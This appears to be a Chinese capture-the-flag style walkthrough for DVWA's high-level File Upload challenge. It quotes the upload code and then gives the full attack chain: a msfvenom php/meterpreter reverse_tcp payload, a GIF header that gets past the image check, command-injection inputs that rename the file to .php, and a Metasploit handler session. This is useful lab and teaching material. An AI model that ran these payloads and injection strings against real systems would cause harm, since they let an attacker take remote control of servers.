由于level 是 high1.代码审计<?phpif( isset( $_POST[ 'Upload' ] ) ) {// Where are we going to be writing to?$target_path= DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/";$target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] );// File information$uploaded_name = $_FILES[ 'uploaded' ][ 'name' ];$uploaded_ext= substr( $uploaded_name, strrpos( $uploaded_name, '.' ) + 1);$uploaded_size = $_FILES[ 'uploaded' ][ 'size' ];$uploaded_tmp= $_FILES[ 'uploaded' ][ 'tmp_name' ];// Is it an image?if( ( strtolower( $uploaded_ext ) == "jpg" || strtolower( $uploaded_ext ) == "jpeg" || strtolower( $uploaded_ext ) == "png" ) &&( $uploaded_size < 100000 ) &&getimagesize( $uploaded_tmp ) ) {// Can we move the file to the upload folder?if( !move_uploaded_file( $uploaded_tmp, $target_path ) ) {// Noecho '<pre>Your image was not uploaded.</pre>';}else {// Yes!echo "<pre>{$target_path} succesfully uploaded!</pre>";}}else {// Invalid fileecho '<pre>Your image was not uploaded. We can only accept JPEG or PNG images.</pre>';}}可以看到对文件类型 和文件大小 , 文件后缀做了判断2. 使用 msfvenom 生成shellcode【DVWA File Upload level high 通关】# lhost 为监听机ip(一般为本机)lport 为监听端口msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.ip.ip lport=3333 -f raw >> shell3.jpeg3. 为了绕过getimagesize函数的检查,vi打开shell.jpeg,头部添加一行GIF98
文章插图
4. 上传文件5. 点击菜单进入
CommandInjection, 我们需要使用命令注入来将文件后缀由jpeg改为php,这样后面访问时,服务器会执行该文件在框中输入:#查看127.0.0.1|ls /app/hackable/uploads/shell3.jpeg# 复制127.0.0.1|cp /app/hackable/uploads/shell3.jpeg /app/hackable/uploads/shell3.php6. 启动msf 等待我们的shellcode的连接msfconsolesf6 > use exploit/multi/handler[*] Using configured payload generic/shell_reverse_tcpmsf6 exploit(multi/handler) > set payload php/meterpreter/reverse_tcppayload => php/meterpreter/reverse_tcpmsf6 exploit(multi/handler) > set lhost 192.168.ip.iplhost => 192.168.ip.ipmsf6 exploit(multi/handler) > set lport 3333lport => 3333msf6 exploit(multi/handler) > run7. 浏览器中输入http://192.168.靶机.ip/hackable/uploads/shell3.php8. msfconsole 将会看到连接信息 , 并可以使用命令操作靶机了
文章插图
Ps: 当然使用weevely 也是一样可以实现的,唯一的区别 , weevely是作为客户端去连靶机shellcode,而msf是作为服务端等靶机的shellcode来连参考: https://www.hackingarticles.in/hack-file-upload-vulnerability-dvwa-bypass-security/
推荐阅读
- 驱动开发:通过ReadFile与内核层通信
- Makfile总结
- srt是什么文件 srt files
- pagefilesys可以删吗
- 文件存储结构的基本形式 exe文件存储形式?
- rawfile怎么转换